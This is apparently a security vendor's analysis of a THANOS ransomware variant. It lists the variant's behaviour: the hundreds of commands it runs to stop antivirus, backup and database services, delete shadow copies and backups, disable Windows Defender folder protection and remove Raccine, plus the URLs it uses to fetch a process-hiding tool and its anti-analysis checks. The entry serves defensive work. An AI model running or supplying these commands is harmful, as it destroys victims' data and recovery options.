Ransom.MSIL.THANOS.THBAIBA

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Elimina las claves de registro asociadas a programas antivirus. Esto permite que el malware ejecute sus rutinas sin ser detectado por los programas antivirus instalados.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

• %User Startup%\mystartup.lnk → points to %User Temp%\HOW_TO_RECOVER_YOUR_FILES.txt (Ransom Note)

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Agrega los procesos siguientes:

• "%System%\notepad.exe" %Desktop%\HOW_TO_RECOVER_YOUR_FILES.txt
• "icacls" "Z:*" /grant Everyone:F /T /C /Q
• "icacls" "D:*" /grant Everyone:F /T /C /Q
• "icacls" "C:*" /grant Everyone:F /T /C /Q
• "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
• "taskkill.exe" /IM mydesktopservice.exe /F
• "taskkill.exe" /IM thebat.exe /F
• "taskkill.exe" /IM steam.exe /F
• "taskkill.exe" /IM agntsvc.exe /F
• "taskkill.exe" /IM xfssvccon.exe /F
• "taskkill.exe" IM thunderbird.exe /F
• "taskkill.exe" /IM dbsnmp.exe /F
• "taskkill.exe" /IM zoolz.exe /F
• "taskkill.exe" /IM infopath.exe /F
• "taskkill.exe" /IM mbamtray.exe /F
• "taskkill.exe" /IM thebat64.exe /F
• "taskkill.exe" /IM ocomm.exe /F
• "taskkill.exe" /IM dbeng50.exe /F
• "taskkill.exe" /IM sqlwriter.exe /F
• "taskkill.exe" /IM tbirdconfig.exe /F
• "taskkill.exe" /IM excel.exe /F
• "taskkill.exe" /IM CNTAoSMgr.exe /F
• "taskkill.exe" /IM sqlservr.exe /F
• "taskkill.exe" /IM encsvc.exe /F
• "taskkill.exe" /IM sqlbrowser.exe /F
• "taskkill.exe" /IM oracle.exe /F
• "taskkill.exe" /IM sqlagent.exe /F
• "taskkill.exe" /IM ocautoupds.exe /F
• "taskkill.exe" /IM ocssd.exe /F
• "taskkill.exe" /IM mysqld-opt.exe /F
• "taskkill.exe" /IM mysqld-nt.exe /F
• "taskkill.exe" /IM wordpad.exe /F
• "taskkill.exe" /IM mydesktopservice.exe /F
• "taskkill.exe" /IM winword.exe /F
• "taskkill.exe" /IM mydesktopqos.exe /F
• "taskkill.exe" /IM visio.exe /F
• "taskkill.exe" /IM powerpnt.exe /F
• "taskkill.exe" /IM tmlisten.exe /F
• "taskkill.exe" /IM msftesql.exe /F
• "taskkill.exe" /IM outlook.exe /F
• "taskkill.exe" /IM msaccess.exe /F
• "taskkill.exe" /IM onenote.exe /F
• "taskkill.exe" /IM PccNTMon.exe /F
• "taskkill.exe" /IM Ntrtscan.exe /F
• "taskkill.exe" /IM isqlplussvc.exe /F
• "taskkill.exe" /IM mydesktopqos.exe /F
• "taskkill.exe" /IM firefoxconfig.exe /F
• "taskkill.exe" /IM sqbcoreservice.exe /F
• "taskkill.exe" /IM mspub.exe /F
• "taskkill.exe" /IM synctime.exe /F
• "taskkill.exe" /IM mysqld.exe /F
• "taskkill.exe" /IM mspub.exe /F
• "net.exe" stop TrueKeyScheduler /y
• "net.exe" stop SQLTELEMETRY /y
• "net.exe" stop SQLSERVERAGENT /y
• "net.exe" stop SQLSafeOLRService /y
• "net.exe" stop TrueKey /y
• "net.exe" stop tmlisten /y
• "net.exe" stop TmCCSF /y
• "net.exe" stop SQLBrowser /y
• "net.exe" stop SQLAgent$VEEAMSQL2012 /y
• "net.exe" stop vapiendpoint /y
• "net.exe" stop swi_update /y
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
• "net.exe" stop swi_update_64 /y
• "net.exe" stop mssql$vim_sqlexp /y
• "net.exe" stop mfefire /y
• "net.exe" stop SQLAgent$TPSAMA /y
• "net.exe" stop OracleClientCache80 /y
• "net.exe" stop WRSVC /y
• "net.exe" stop swi_service /y
• "net.exe" stop SQLTELEMETRY$ECWDB2 /y
• "net.exe" stop VeeamTransportSvc /y
• "net.exe" stop SQLAgent$TPS /y
• "net.exe" stop TrueKeyServiceHelper /y
• "net.exe" stop McTaskManager /y
• "net.exe" stop swi_filter /y
• "net.exe" stop SstpSvc /y
• "net.exe" stop MySQL80 /y
• "net.exe" stop SQLAgent$SYSTEM_BGC /y
• "net.exe" stop svcGenericHost /y
• "net.exe" stop SQLAgent$SOPHOS /y
• "net.exe" stop SQLAgent$SQLEXPRESS /y
• "net.exe" stop SQLAgent$SQL_2008 /y
• "net.exe" stop sophossps /y
• "net.exe" stop SQLAgent$SHAREPOINT /y
• "net.exe" stop SntpService /y
• "net.exe" stop SQLAgent$SBSMONITORING /y
• "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
• "net.exe" stop SmcService /y
• "net.exe" stop Smcinst /y
• "net.exe" stop SQLAgent$PROD /y
• "net.exe" stop SQLAgent$PRACTTICEMGT /y
• "net.exe" stop ShMonitor /y
• "net.exe" stop SQLAgent$PRACTTICEBGC /y
• "net.exe" stop SepMasterService /y
• "net.exe" stop SAVService /y
• "net.exe" stop SAVAdminService /y
• "net.exe" stop SQLAgent$ECWDB2 /y
• "net.exe" stop SQLAgent$CXDB /y
• "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
• "net.exe" stop sacsvr /y
• "net.exe" stop MSSQL$SOPHOS /y
• "net.exe" stop sms_site_sql_backup /y
• "net.exe" stop SQLAgent$BKUPEXEC /y
• "net.exe" stop RESvc /y
• "net.exe" stop mfevtp /y
• "net.exe" stop wbengine /y
• "net.exe" stop ReportServer$SQL_2008 /y
• "net.exe" stop mfemms /y
• "net.exe" stop wbengine /y
• "net.exe" stop DCAgent /y
• "net.exe" stop MSSQL$SHAREPOINT /y
• "net.exe" stop BackupExecVSSProvider /y
• "net.exe" stop MSSQL$ECWDB2 /y
• "net.exe" stop audioendpointbuilder /y
• "net.exe" stop “Sophos Safestore Service” /y
• "net.exe" stop BackupExecAgentBrowser /y
• "net.exe" stop MSSQL$PRACTICEMGT /y
• "net.exe" stop “Sophos System Protection Service” /y
• "net.exe" stop BackupExecDeviceMediaService /y
• "net.exe" stop MSSQL$PRACTTICEBGC /y
• "net.exe" stop “Sophos Web Control Service” /y
• "net.exe" stop BackupExecJobEngine /y
• "net.exe" stop MSSQL$PROD /y
• "net.exe" stop AcronisAgent /y
• "net.exe" stop BackupExecManagementService /y
• "net.exe" stop MSSQL$PROFXENGAGEMENT /y
• "net.exe" stop Antivirus /y
• "net.exe" stop BackupExecRPCService /y
• "net.exe" stop MSSQL$SBSMONITORING /
• "net.exe" stop MSSQL$SBSMONITORING /y
• "net.exe" stop AVP /y
• "net.exe" stop msftesql$PROD /y
• "net.exe" stop VeeamRESTSvc /y
• "net.exe" stop BackupExecAgentAccelerator /y
• "net.exe" stop “SQLsafe Filter Service” /y
• "net.exe" stop McShield /y
• "net.exe" stop “Sophos Message Router” /y
• "net.exe" stop unistoresvc_1af40a /y
• "net.exe" stop MSSQL$BKUPEXEC /y
• "net.exe" stop “Sophos MCS Client” /y
• "net.exe" stop ARSM /y
• "net.exe" stop msexchangeimap4 /y
• "net.exe" stop MSOLAP$TPSAMA /y
• "net.exe" stop “intel(r) proset monitoring service” /y
• "net.exe" stop “Sophos MCS Agent” /y
• "net.exe" stop AcrSch2Svc /y
• "net.exe" stop msexchangeadtopology /y
• "net.exe" stop MSOLAP$TPS /y
• "net.exe" stop “aphidmonitorservice” /y
• "net.exe" stop ReportServer$TPSAMA /y
• "net.exe" stop “Zoolz 2 Service” /y
• "net.exe" stop “Sophos Health Service” /y
• "net.exe" stop W3Svc /y
• "net.exe" stop MSExchangeSRS /y
• "net.exe" stop MSOLAP$SYSTEM_BGC /y
• "net.exe" stop “Veeam Backup Catalog Data Service” /y
• "net.exe" stop ReportServer$TPS /y
• "net.exe" stop “Sophos File Scanner Service” /y
• "net.exe" stop MSExchangeSA /y
• "net.exe" stop UI0Detect /y
• "net.exe" stop MSOLAP$SQL_2008 /y
• "net.exe" stop “Symantec System Recovery” /y
• "net.exe" stop ReportServer$SYSTEM_BGC /y
• "net.exe" stop “Sophos Device Control Service” /y
• "net.exe" stop ReportServer$SQL_2008 /y
• "net.exe" stop MySQL57 /y
• "net.exe" stop MSExchangeMTA /y
• "net.exe" stop SMTPSvc /y
• "net.exe" stop VeeamNFSSvc /y
• "net.exe" start upnphost /y
• "net.exe" stop MsDtsServer /y
• "net.exe" stop IISAdmin /y
• "net.exe" stop MSExchangeES /y
• "net.exe" stop “Sophos Agent” /y
• "net.exe" stop EraserSvc11710 /y
• "net.exe" stop “Enterprise Client Service” /y
• "net.exe" stop “SQL Backups /y
• "net.exe" stop MsDtsServer100 /y
• "net.exe" stop NetMsmqActivator /y
• "net.exe" stop MSExchangeIS /y
• "net.exe" stop “Sophos AutoUpdate Service” /y
• "net.exe" stop SamSs /y
• "net.exe" stop ReportServer /y
• "net.exe" stop “SQLsafe Backup Service” /y
• "net.exe" stop MsDtsServer110 /y
• "net.exe" stop POP3Svc /y
• "net.exe" stop MSExchangeMGMT /y
• "net.exe" stop “Sophos Clean Service” /y
• "net.exe" stop zhudongfangyu /y
• "net.exe" stop stc_raw_agent /y
• "net.exe" stop VSNAPVSS /y
• "net.exe" stop VeeamTransportSvc /y
• "net.exe" stop VeeamDeploymentService /y
• "net.exe" stop VeeamNFSSvc /y
• "net.exe" stop veeam /y
• "net.exe" stop PDVFSService /y
• "net.exe" stop BackupExecVSSProvider /y
• "net.exe" stop BackupExecAgentAccelerator /y
• "net.exe" stop BackupExecAgentBrowser /y
• "net.exe" stop BackupExecDiveciMediaService /y
• "net.exe" stop BackupExecJobEngine /y
• "net.exe" stop BackupExecManagementService /y
• "net.exe" stop BackupExecRPCService /y
• "net.exe" stop AcrSch2Svc /y
• "net.exe" stop AcronisAgent /y
• "net.exe" stop CASAD2DWebSvc /y
• "net.exe" stop CAARCUpdateSvc /y
• "net.exe" stop sophos /y
• "net.exe" stop “Acronis VSS Provider” /y
• "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
• "net.exe" start FDResPub /y
• "net.exe" start SSDPSRV /y
• "net.exe" stop avpsus /y
• "net.exe" stop McAfeeDLPAgentService /y
• "net.exe" stop mfewc /y
• "net.exe" stop BMR Boot Service /y
• "net.exe" stop NetBackup BMR MTFTP Service /y
• "net.exe" stop DefWatch /y
• "net.exe" stop ccEvtMgr /y
• "net.exe" stop ccSetMgr /y
• "net.exe" stop SavRoam /y
• "net.exe" stop RTVscan /y
• "net.exe" stop QBFCService /y
• "net.exe" stop QBIDPService /y
• "net.exe" stop Intuit.QuickBooks.FCS /y
• "net.exe" stop QBCFMonitorService /y
• "net.exe" stop YooBackup /y
• "net.exe" stop YooIT /y
• "net.exe" stop MSSQLServerOLAPService /y
• "net.exe" stop VeeamMountSvc /y
• "net.exe" stop McAfeeFramework /y
• "net.exe" stop MSSQLServerADHelper100 /y
• "net.exe" stop McAfeeEngineService /y
• "net.exe" stop VeeamHvIntegrationSvc /y
• "net.exe" stop MSSQLServerADHelper /y
• "net.exe" stop MBEndpointAgent /y
• "net.exe" stop VeeamEnterpriseManagerSvc /y
• "net.exe" stop VeeamDeploySvc /y
• "net.exe" stop MSSQLSERVER /y
• "net.exe" stop MBAMService /y
• "net.exe" stop MSSQLFDLauncher$TPSAMA /y
• "net.exe" stop masvc /y
• "net.exe" stop VeeamDeploymentService /y
• "net.exe" stop MSSQLFDLauncher$TPS /y
• "net.exe" stop macmnsvc /y
• "net.exe" stop VeeamCloudSvc /y
• "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
• "net.exe" stop VeeamCatalogSvc /y
• "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
• "net.exe" stop klnagent /y
• "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
• "net.exe" stop kavfsslp /y
• "net.exe" stop VeeamBrokerSvc /y
• "net.exe" stop KAVFSGT /y
• "net.exe" stop VeeamBackupSvc /y
• "net.exe" stop SQLWriter /y
• "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
• "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
• "net.exe" stop KAVFS /y
• "net.exe" stop FA_Scheduler /y
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
• "net.exe" stop SDRSVC /y
• "net.exe" stop MSSQL$VEEAMSQL2012 /y
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
• "net.exe" stop ESHASRV /y
• "net.exe" stop PDVFSService /y
• "net.exe" stop EsgShKernel /y
• "net.exe" stop MSSQL$TPSAMA /y
• "net.exe" stop ntrtscan /y
• "net.exe" stop EPUpdateService /y
• "net.exe" stop MSSQL$TPS /y
• "net.exe" stop EPSecurityService /y
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
• "net.exe" stop MSSQL$SYSTEM_BGC /y
• "net.exe" stop ekrn /y
• "net.exe" stop mozyprobackup /y
• "net.exe" stop MMS /y
• "net.exe" stop MSSQL$SQLEXPRESS /y
• "net.exe" stop EhttpSrv /y
• "net.exe" stop bedbg /y
• "net.exe" stop MSSQL$SQL_2008 /y
• "net.exe" start Dnscache /y
• "sc.exe" config SSDPSRV start= auto
• "sc.exe" config FDResPub start= auto
• "sc.exe" config upnphost start= auto
• "sc.exe" config SstpSvc start= disabled
• "sc.exe" config SQLWriter start= disabled
• "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
• "sc.exe" config SQLTELEMETRY start= disabled
• "sc.exe" config Dnscache start= auto
• "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
• "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
• "cmd.exe" /c rd /s /q D:\$Recycle.bin
• "schtasks" /DELETE /TN "Raccine Rules Updater" /F
• "cmd.exe" /c rd /s /q %%SYSTEMDRIVE%%\$Recycle.bin
• "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
• "reg" delete HKCU\Software\Raccine /F
• "taskkill" /F /IM RaccineSettings.exe
• powershell.exe Set-MpPreference -EnableControlledFolderAccess Disable

(Nota: %Desktop% es la carpeta Escritorio del usuario activo, que en el caso de Windows 98 y ME suele estar en C:\Windows\Profiles\{nombre de usuario}\Escritorio, en el caso de Windows NT en C:\WINNT\Profiles\{nombre de usuario}\Escritorio, en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) en C:\Documents and Settings\{nombre de usuario}\Escritorio y en el caso de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\Desktop).

Agrega las siguientes exclusiones mutuas para garantizar que solo se ejecuta una de sus copias en todo momento:

• Global\a61e092f-af60-4971-9606-2414b1d0e04b

Termina su ejecución cuando encuentra los siguientes procesos en la memoria del sistema afectado:

• http analyzer stand-alone
• fiddler
• effetech http sniffer
• firesheep
• IEWatch Professional
• dumpcap
• wireshark
• wireshark portable
• sysinternals tcpview
• NetworkMiner
• NetworkTrafficView
• HTTPNetworkSniffer
• tcpdump
• intercepter
• Intercepter-NG
• ollydbg
• x64dbg
• x32dbg
• dnspy
• dnspy-x86
• de4dot
• ilspy
• dotpeek
• dotpeek64
• ida64
• RDG Packer Detector
• CFF Explorer
• PEiD
• protection_id
• LordPE
• pe-sieve
• MegaDumper
• UnConfuserEx
• Universal_Fixer
• NoFuserEx

Otras modificaciones del sistema

Agrega las siguientes entradas de registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon
LegalNoticeCaption = YOUR FILES IN SAFELY LOCKED AND YOUR PASSWORD WAS CHANGED by Alumni AFTER THE PAYMENT PLEASE CONTACT WITH US ASAP.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon
LegalNoticeText = {Text from Ransom Note}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
legalnoticecaption = YOUR FILES IN SAFELY LOCKED AND YOUR PASSWORD WAS CHANGED by Alumni AFTER THE PAYMENT PLEASE CONTACT WITH US ASAP.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
legalnoticetext = {Text from Ransom Note}

Elimina las siguientes claves de registro asociadas a aplicaciones antivirus y de seguridad:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\EventLog\Application
Raccine =

HKEY_LOCAL_MACHINE\SOFTWARE
Raccine =

HKEY_CURRENT_USER\SOFTWARE
Raccine =

Otros detalles

Cifra los archivos con las extensiones siguientes:

• .txt
• .jpeg
• .gif
• .jpg
• .png
• .php
• .cs
• .cpp
• .rar
• .zip
• .html
• .htm
• .xls
• .avi
• .mp4
• .ppt
• .doc
• .sxi
• .sxw
• .odt
• .hwp
• .tar
• .bz2
• .mkv
• .eml
• .msg
• .ost
• .pst
• .edb
• .sql
• .accdb
• .mdb
• .dbf
• .odb
• .myd
• .java
• .pas
• .asm
• .key
• .pfx
• .pem
• .p12
• .csr
• .gpg
• .aes
• .vsd
• .odg
• .raw
• .nef
• .svg
• .psd
• .vmx
• .vmdk
• .vdi
• .lay6
• .sqlite3
• .sqlitedb
• .class
• .mpeg
• .djvu
• .tiff
• .backup
• .cert
• .docm
• .xlsm
• .dwg
• .bak
• .qbw
• .nd
• .tlg
• .lgb
• .pptx
• .mov
• .xdw
• .ods
• .wav
• .mp3
• .aiff
• .flac
• .m4a
• .ora
• .mdf
• .ldf
• .ndf
• .dtsx
• .rdl
• .dim
• .mrimg
• .qbb
• .rtf
• .7z

Hace lo siguiente:

• encrypts all available drives except for CDROMs
• empties recycle bin using the following commands:
  • "cmd.exe" /c rd /s /q D:\$Recycle.bin
  • "cmd.exe" /c rd /s /q %%SYSTEMDRIVE%%\$Recycle.bin
• Terminates and deletes itself using the following commands:
  • cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  • cmd.exe /C choice /C Y /N /D Y /T 3 & Del
• deletes the following subkeys under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options:
  • vssadmin.exe
  • wmic.exe
  • wbadmin.exe
  • bcdedit.exe
  • powershell.exe
  • diskshadow.exe
  • net.exe
• displays the following tooltip notification:
  
• attempts to hide itself from specific monitoring tools by doing the following:
  • downloads ProcessHide32/64 binary to %User Temp%\{random}.exe (deletes after use) from the following URLs:
    • https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
    • https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide32.exe
  • checks if the following monitoring processes containing the following strings are running:
    • Taskmgr
    • taskmgr
    • ProcessHacker
    • procexp
  • executes ProcessHide32/64 with the following parameters:
    • {PID of checked process} {full file path + name of malware} [" *32"]
• terminates large running processes taking up memory if the following strings are not found in the process name:
  • {malware name}.exe
  • chrome
  • opera
  • msedge
  • iexplore
  • firefox
  • explorer
  • wininit
  • winlogon
  • SearchApp
  • SearchIndexer
  • SearchUI
• if infected system is in Windows XP, creates the following processes to delete shadow copies:
  • vssadmin.exe Delete Shadows /all /quiet
  • vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • vssadmin.exe Delete Shadows /all /quiet
• attempts to delete backup files using the following processes:
  • del.exe /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
  • del.exe /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
  • del.exe /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
  • del.exe /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
  • del.exe /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk